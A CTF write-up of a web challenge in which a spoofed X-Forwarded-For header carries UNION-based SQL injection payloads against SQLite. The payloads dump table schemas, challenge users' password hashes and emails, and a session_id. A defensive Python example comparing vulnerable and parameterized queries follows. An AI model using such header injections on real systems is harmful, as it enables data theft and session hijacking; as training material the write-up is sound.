[Saudi and Oman National Cyber Security CTF 2019] [Web] Maria WriteUp

Hello,

I’m about to share a WebSecurity WriteUp

Let’s Open the link and see what we have …

In this Challenge there are two hints:

1. The website stores our IP address in the database

2. Maria is the only person that can reveal the flag

The Source Code:

SELECT * FROM nxf8_sessions where ip_address = '*.*.*.*'

We send that to BurpSuite

Let’s Try to change our IP Address from headers via BurpSuite ….

X-Forwarded-For: 127.0.0.1

IP Changed

Let’s see if there is any possibility of SQL injection ….

Let’s reduce the number of columns to avoid the error message

So we have a SQLi …. (I can’t explain more; those are basics, as we know. Just follow the pics …)

We are dealing with SQLite here

I found two tables:

nxf8_sessions
nxf8_users

Let’s grab columns via an easy method

X-Forwarded-For: 127.0.0.1' UNION SELECT 1,2,3,sql FROM sqlite_master WHERE type ='table' AND name = 'nxf8_sessions' LIMIT 0,1 -- -

And for users

X-Forwarded-For: 127.0.0.1' UNION SELECT 1,2,3,sql FROM sqlite_master WHERE type ='table' AND name = 'nxf8_users' LIMIT 0,1 -- -

From users I found that Maria’s ID is: 5

ID:
1,2,3,4,5,6,7,8
Name:
Alex,Trevor,Jacob,Paul,Maria,Mira,Michael,Joshua
Password:
f7af8e099d32a7d4de771c47d7d21000eb073c77,b6d435bbaa57016efe1f67b11f88fb47a459180a,7a19fdecb23571ed265321c9f764e6a6f81f3373,20af2164daf4bfaa73d89229782b8f01686584fe,d3e1330bac4810f24a5cd3d5a0e5a74e5d4c05c2,2f7a7814f81e84ecc4d73e8fd245fa603065632a,b19213f749af5e451d5f7ee4be0147294eea1709,506f329f5e6f5b456900b9f5ef6a308890d52cfc
Email:
alex@noweb.org,trevor@noweb.org,jacob@noweb.org,paul@noweb.org,maria@noweb.org,mira@noweb.org,michael@noweb.org,joshua@noweb.org

And in our challenge there are no login pages or anything that lets us get the flag, and it’s required to use Maria as a user ….

I tried to crack the password but got nothing, and after a while I went back to our “nxf8_sessions” table

X-Forwarded-For: 127.0.0.1' UNION SELECT 1,2,3,session_id FROM nxf8_sessions WHERE user_id =5 LIMIT 0,1 -- -
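
For the defensive side of this write-up, here is an added example (not the challenge's own code) that puts the query pattern behind this bug next to a hardened lookup. The in-memory database, its rows, the `id` column name and the function names are assumptions made for the demo; the table name, the other columns and the header value shape come from the write-up.

```python
import ipaddress
import sqlite3

# Header value in the same shape as the write-up's last request (constructed IP).
SAMPLE_HEADER = ("203.0.113.7' UNION SELECT 1,2,3,session_id "
                 "FROM nxf8_sessions WHERE user_id =5 LIMIT 0,1 -- -")

def build_db():
    """Constructed stand-in for the challenge database (4 columns, as the UNION implies)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE nxf8_sessions (id INTEGER, user_id INTEGER,
                                    ip_address TEXT, session_id TEXT);
        INSERT INTO nxf8_sessions VALUES (1, 1, '127.0.0.1', 'constructed-session-a');
        INSERT INTO nxf8_sessions VALUES (2, 5, '10.0.0.9',  'constructed-session-b');
    """)
    return db

def lookup_vulnerable(db, header_value):
    # The flawed pattern: client-controlled header text is pasted into the SQL string,
    # so a quote in the header ends the literal and the rest runs as SQL.
    sql = "SELECT * FROM nxf8_sessions WHERE ip_address = '" + header_value + "'"
    return db.execute(sql).fetchall()

def lookup_hardened(db, header_value):
    # Layer 1: the value must parse as an IPv4/IPv6 address, otherwise it is rejected.
    try:
        ip = str(ipaddress.ip_address(header_value.strip()))
    except ValueError:
        return []
    # Layer 2: bound parameter, so the value is never interpreted as SQL.
    # A deployment should also only honor X-Forwarded-For when the request
    # arrives from a proxy it trusts, and use the socket peer address otherwise.
    return db.execute(
        "SELECT * FROM nxf8_sessions WHERE ip_address = ?", (ip,)
    ).fetchall()

if __name__ == "__main__":
    db = build_db()
    print("vulnerable:", lookup_vulnerable(db, SAMPLE_HEADER))
    print("hardened:  ", lookup_hardened(db, SAMPLE_HEADER))
    print("legit IP:  ", lookup_hardened(db, "127.0.0.1"))
```
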